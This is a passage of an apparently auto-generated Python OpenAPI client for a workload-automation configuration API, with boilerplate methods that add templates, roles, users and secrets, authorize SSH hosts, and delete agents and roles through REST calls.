auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def add_pgp_template(self, server, agent, template_name, pgp_template_data, **kwargs): # noqa: E501 """Add PGP Template # noqa: E501 Add PGP Template # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.add_pgp_template(server, agent, template_name, pgp_template_data, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :param str template_name: The PGP Template Name (required) :param PgpTemplateData pgp_template_data: PGP Template Data (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.add_pgp_template_with_http_info(server, agent, template_name, pgp_template_data, **kwargs) # noqa: E501 else: (data) = self.add_pgp_template_with_http_info(server, agent, template_name, pgp_template_data, **kwargs) # noqa: E501 return data def add_pgp_template_with_http_info(self, server, agent, template_name, pgp_template_data, **kwargs): # noqa: E501 """Add PGP Template # noqa: E501 Add PGP Template # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.add_pgp_template_with_http_info(server, agent, template_name, pgp_template_data, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :param str template_name: The PGP Template Name (required) :param PgpTemplateData pgp_template_data: PGP Template Data (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['server', 'agent', 'template_name', 'pgp_template_data'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method add_pgp_template" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `add_pgp_template`") # noqa: E501 # verify the required parameter 'agent' is set if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None): # noqa: E501 raise ValueError("Missing the required parameter `agent` when calling `add_pgp_template`") # noqa: E501 # verify the required parameter 'template_name' is set if self.api_client.client_side_validation and ('template_name' not in params or params['template_name'] is None): # noqa: E501 raise ValueError("Missing the required parameter `template_name` when calling `add_pgp_template`") # noqa: E501 # verify the required parameter 'pgp_template_data' is set if self.api_client.client_side_validation and ('pgp_template_data' not in params or params['pgp_template_data'] is None): # noqa: E501 raise ValueError("Missing the required parameter `pgp_template_data` when calling `add_pgp_template`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'agent' in params: path_params['agent'] = params['agent'] # noqa: E501 if 'template_name' in params: path_params['templateName'] = params['template_name'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'pgp_template_data' in params: body_params = params['pgp_template_data'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/agent/{agent}/mft/pgptemplate/{templateName}', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def add_role(self, role_file, **kwargs): # noqa: E501 """Add Authorization Role # noqa: E501 Add Authorization Role # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.add_role(role_file, async_req=True) >>> result = thread.get() :param async_req bool :param file role_file: File with contenet of Role Data. (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.add_role_with_http_info(role_file, **kwargs) # noqa: E501 else: (data) = self.add_role_with_http_info(role_file, **kwargs) # noqa: E501 return data def add_role_with_http_info(self, role_file, **kwargs): # noqa: E501 """Add Authorization Role # noqa: E501 Add Authorization Role # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.add_role_with_http_info(role_file, async_req=True) >>> result = thread.get() :param async_req bool :param file role_file: File with contenet of Role Data. (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['role_file'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method add_role" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'role_file' is set if self.api_client.client_side_validation and ('role_file' not in params or params['role_file'] is None): # noqa: E501 raise ValueError("Missing the required parameter `role_file` when calling `add_role`") # noqa: E501 collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} if 'role_file' in params: local_var_files['roleFile'] = params['role_file'] # noqa: E501 body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501 ['multipart/form-data']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/authorization/role', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def add_role_to_ldap_group(self, ldapgroup, role, **kwargs): # noqa: E501 """Add a role to LDAP group # noqa: E501 Add a role to LDAP group so any user belong to the LDAP group will get all permissions defined in the role # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.add_role_to_ldap_group(ldapgroup, role, async_req=True) >>> result = thread.get() :param async_req bool :param str ldapgroup: Name of LDAP group (required) :param str role: Name of role (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.add_role_to_ldap_group_with_http_info(ldapgroup, role, **kwargs) # noqa: E501 else: (data) = self.add_role_to_ldap_group_with_http_info(ldapgroup, role, **kwargs) # noqa: E501 return data def add_role_to_ldap_group_with_http_info(self, ldapgroup, role, **kwargs): # noqa: E501 """Add a role to LDAP group # noqa: E501 Add a role to LDAP group so any user belong to the LDAP group will get all permissions defined in the role # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.add_role_to_ldap_group_with_http_info(ldapgroup, role, async_req=True) >>> result = thread.get() :param async_req bool :param str ldapgroup: Name of LDAP group (required) :param str role: Name of role (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['ldapgroup', 'role'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method add_role_to_ldap_group" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'ldapgroup' is set if self.api_client.client_side_validation and ('ldapgroup' not in params or params['ldapgroup'] is None): # noqa: E501 raise ValueError("Missing the required parameter `ldapgroup` when calling `add_role_to_ldap_group`") # noqa: E501 # verify the required parameter 'role' is set if self.api_client.client_side_validation and ('role' not in params or params['role'] is None): # noqa: E501 raise ValueError("Missing the required parameter `role` when calling `add_role_to_ldap_group`") # noqa: E501 collection_formats = {} path_params = {} if 'ldapgroup' in params: path_params['ldapgroup'] = params['ldapgroup'] # noqa: E501 if 'role' in params: path_params['role'] = params['role'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/authorization/ldap/{ldapgroup}/role/{role}', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def add_secret(self, name_value, **kwargs): # noqa: E501 """Add a new secret # noqa: E501 Add a new secret to the secrets vault. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.add_secret(name_value, async_req=True) >>> result = thread.get() :param async_req bool :param SecretKeyValue name_value: The new secret value (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.add_secret_with_http_info(name_value, **kwargs) # noqa: E501 else: (data) = self.add_secret_with_http_info(name_value, **kwargs) # noqa: E501 return data def add_secret_with_http_info(self, name_value, **kwargs): # noqa: E501 """Add a new secret # noqa: E501 Add a new secret to the secrets vault. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.add_secret_with_http_info(name_value, async_req=True) >>> result = thread.get() :param async_req bool :param SecretKeyValue name_value: The new secret value (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['name_value'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method add_secret" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'name_value' is set if self.api_client.client_side_validation and ('name_value' not in params or params['name_value'] is None): # noqa: E501 raise ValueError("Missing the required parameter `name_value` when calling `add_secret`") # noqa: E501 collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'name_value' in params: body_params = params['name_value'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/secret', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def add_user(self, user_file, **kwargs): # noqa: E501 """Add user # noqa: E501 Add user # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.add_user(user_file, async_req=True) >>> result = thread.get() :param async_req bool :param file user_file: File with contenet of user data. (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.add_user_with_http_info(user_file, **kwargs) # noqa: E501 else: (data) = self.add_user_with_http_info(user_file, **kwargs) # noqa: E501 return data def add_user_with_http_info(self, user_file, **kwargs): # noqa: E501 """Add user # noqa: E501 Add user # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.add_user_with_http_info(user_file, async_req=True) >>> result = thread.get() :param async_req bool :param file user_file: File with contenet of user data. (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['user_file'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method add_user" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'user_file' is set if self.api_client.client_side_validation and ('user_file' not in params or params['user_file'] is None): # noqa: E501 raise ValueError("Missing the required parameter `user_file` when calling `add_user`") # noqa: E501 collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} if 'user_file' in params: local_var_files['userFile'] = params['user_file'] # noqa: E501 body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501 ['multipart/form-data']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/authorization/user', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def add_zos_template(self, server, agent, template_name, zos_template_data, **kwargs): # noqa: E501 """Add z/OS Template # noqa: E501 Add z/OS Template # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.add_zos_template(server, agent, template_name, zos_template_data, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :param str template_name: The z/OS Template Name (required) :param ZosTemplateData zos_template_data: z/OS Template Data (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.add_zos_template_with_http_info(server, agent, template_name, zos_template_data, **kwargs) # noqa: E501 else: (data) = self.add_zos_template_with_http_info(server, agent, template_name, zos_template_data, **kwargs) # noqa: E501 return data def add_zos_template_with_http_info(self, server, agent, template_name, zos_template_data, **kwargs): # noqa: E501 """Add z/OS Template # noqa: E501 Add z/OS Template # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.add_zos_template_with_http_info(server, agent, template_name, zos_template_data, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :param str template_name: The z/OS Template Name (required) :param ZosTemplateData zos_template_data: z/OS Template Data (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['server', 'agent', 'template_name', 'zos_template_data'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method add_zos_template" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `add_zos_template`") # noqa: E501 # verify the required parameter 'agent' is set if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None): # noqa: E501 raise ValueError("Missing the required parameter `agent` when calling `add_zos_template`") # noqa: E501 # verify the required parameter 'template_name' is set if self.api_client.client_side_validation and ('template_name' not in params or params['template_name'] is None): # noqa: E501 raise ValueError("Missing the required parameter `template_name` when calling `add_zos_template`") # noqa: E501 # verify the required parameter 'zos_template_data' is set if self.api_client.client_side_validation and ('zos_template_data' not in params or params['zos_template_data'] is None): # noqa: E501 raise ValueError("Missing the required parameter `zos_template_data` when calling `add_zos_template`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'agent' in params: path_params['agent'] = params['agent'] # noqa: E501 if 'template_name' in params: path_params['templateName'] = params['template_name'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'zos_template_data' in params: body_params = params['zos_template_data'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/agent/{agent}/mft/zostemplate/{templateName}', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def authorize_mft_ssh_cluster(self, server, agent, cluster_name, hostname_port_list, **kwargs): # noqa: E501 """Authorize SSH Cluster # noqa: E501 Authorize SSH Cluster # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.authorize_mft_ssh_cluster(server, agent, cluster_name, hostname_port_list, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :param str cluster_name: Ssh Cluster Name (required) :param ClusterAuthorizationData hostname_port_list: File with content of hostnames and ports (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.authorize_mft_ssh_cluster_with_http_info(server, agent, cluster_name, hostname_port_list, **kwargs) # noqa: E501 else: (data) = self.authorize_mft_ssh_cluster_with_http_info(server, agent, cluster_name, hostname_port_list, **kwargs) # noqa: E501 return data def authorize_mft_ssh_cluster_with_http_info(self, server, agent, cluster_name, hostname_port_list, **kwargs): # noqa: E501 """Authorize SSH Cluster # noqa: E501 Authorize SSH Cluster # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.authorize_mft_ssh_cluster_with_http_info(server, agent, cluster_name, hostname_port_list, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :param str cluster_name: Ssh Cluster Name (required) :param ClusterAuthorizationData hostname_port_list: File with content of hostnames and ports (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['server', 'agent', 'cluster_name', 'hostname_port_list'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method authorize_mft_ssh_cluster" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `authorize_mft_ssh_cluster`") # noqa: E501 # verify the required parameter 'agent' is set if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None): # noqa: E501 raise ValueError("Missing the required parameter `agent` when calling `authorize_mft_ssh_cluster`") # noqa: E501 # verify the required parameter 'cluster_name' is set if self.api_client.client_side_validation and ('cluster_name' not in params or params['cluster_name'] is None): # noqa: E501 raise ValueError("Missing the required parameter `cluster_name` when calling `authorize_mft_ssh_cluster`") # noqa: E501 # verify the required parameter 'hostname_port_list' is set if self.api_client.client_side_validation and ('hostname_port_list' not in params or params['hostname_port_list'] is None): # noqa: E501 raise ValueError("Missing the required parameter `hostname_port_list` when calling `authorize_mft_ssh_cluster`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'agent' in params: path_params['agent'] = params['agent'] # noqa: E501 if 'cluster_name' in params: path_params['clusterName'] = params['cluster_name'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'hostname_port_list' in params: body_params = params['hostname_port_list'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/agent/{agent}/mft/ssh/cluster/{clusterName}', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def authorize_mft_ssh_host(self, server, agent, hostname, **kwargs): # noqa: E501 """Authorize SSH Host # noqa: E501 Authorize SSH Host for SFTP account # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.authorize_mft_ssh_host(server, agent, hostname, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :param str hostname: Ssh Hostname (required) :param str port: Ssh port for the relevant host :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.authorize_mft_ssh_host_with_http_info(server, agent, hostname, **kwargs) # noqa: E501 else: (data) = self.authorize_mft_ssh_host_with_http_info(server, agent, hostname, **kwargs) # noqa: E501 return data def authorize_mft_ssh_host_with_http_info(self, server, agent, hostname, **kwargs): # noqa: E501 """Authorize SSH Host # noqa: E501 Authorize SSH Host for SFTP account # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.authorize_mft_ssh_host_with_http_info(server, agent, hostname, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :param str hostname: Ssh Hostname (required) :param str port: Ssh port for the relevant host :return: SuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['server', 'agent', 'hostname', 'port'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method authorize_mft_ssh_host" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `authorize_mft_ssh_host`") # noqa: E501 # verify the required parameter 'agent' is set if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None): # noqa: E501 raise ValueError("Missing the required parameter `agent` when calling `authorize_mft_ssh_host`") # noqa: E501 # verify the required parameter 'hostname' is set if self.api_client.client_side_validation and ('hostname' not in params or params['hostname'] is None): # noqa: E501 raise ValueError("Missing the required parameter `hostname` when calling `authorize_mft_ssh_host`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'agent' in params: path_params['agent'] = params['agent'] # noqa: E501 if 'hostname' in params: path_params['hostname'] = params['hostname'] # noqa: E501 query_params = [] if 'port' in params: query_params.append(('port', params['port'])) # noqa: E501 header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/agent/{agent}/mft/ssh/host/{hostname}', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def create_run_as_user(self, server, run_as_user_data, **kwargs): # noqa: E501 """Add a new Run-as user # noqa: E501 Add a new Run-as user to server. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.create_run_as_user(server, run_as_user_data, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server. (required) :param RunAsUserData run_as_user_data: Run as user data (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.create_run_as_user_with_http_info(server, run_as_user_data, **kwargs) # noqa: E501 else: (data) = self.create_run_as_user_with_http_info(server, run_as_user_data, **kwargs) # noqa: E501 return data def create_run_as_user_with_http_info(self, server, run_as_user_data, **kwargs): # noqa: E501 """Add a new Run-as user # noqa: E501 Add a new Run-as user to server. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.create_run_as_user_with_http_info(server, run_as_user_data, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server. (required) :param RunAsUserData run_as_user_data: Run as user data (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['server', 'run_as_user_data'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method create_run_as_user" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `create_run_as_user`") # noqa: E501 # verify the required parameter 'run_as_user_data' is set if self.api_client.client_side_validation and ('run_as_user_data' not in params or params['run_as_user_data'] is None): # noqa: E501 raise ValueError("Missing the required parameter `run_as_user_data` when calling `create_run_as_user`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'run_as_user_data' in params: body_params = params['run_as_user_data'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/runasuser', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def delete_agent(self, server, agent, **kwargs): # noqa: E501 """delete an agent from Server # noqa: E501 Delete an agent from a Server. This will not shut the agent down. It only disconnects and removes it from the list. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.delete_agent(server, agent, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server the agent is connected to. (required) :param str agent: The name of the agent to delete. (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.delete_agent_with_http_info(server, agent, **kwargs) # noqa: E501 else: (data) = self.delete_agent_with_http_info(server, agent, **kwargs) # noqa: E501 return data def delete_agent_with_http_info(self, server, agent, **kwargs): # noqa: E501 """delete an agent from Server # noqa: E501 Delete an agent from a Server. This will not shut the agent down. It only disconnects and removes it from the list. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.delete_agent_with_http_info(server, agent, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server the agent is connected to. (required) :param str agent: The name of the agent to delete. (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['server', 'agent'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method delete_agent" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `delete_agent`") # noqa: E501 # verify the required parameter 'agent' is set if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None): # noqa: E501 raise ValueError("Missing the required parameter `agent` when calling `delete_agent`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'agent' in params: path_params['agent'] = params['agent'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/agent/{agent}', 'DELETE', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def delete_authorization_role(self, role, **kwargs): # noqa: E501 """Delete Authorization Role # noqa: E501 Delete Authorization Role # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.delete_authorization_role(role, async_req=True) >>> result = thread.get() :param async_req bool :param str role: The Role name. (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.delete_authorization_role_with_http_info(role, **kwargs) # noqa: E501 else: (data) = self.delete_authorization_role_with_http_info(role, **kwargs) # noqa: E501 return data def delete_authorization_role_with_http_info(self, role, **kwargs): # noqa: E501 """Delete Authorization Role # noqa: E501 Delete Authorization Role # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.delete_authorization_role_with_http_info(role, async_req=True) >>> result = thread.get() :param async_req bool :param str role: The Role name. (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['role'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method delete_authorization_role" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'role' is set if self.api_client.client_side_validation and ('role' not in params or params['role'] is None): # noqa: E501 raise ValueError("Missing the required parameter `role` when calling `delete_authorization_role`") # noqa: E501 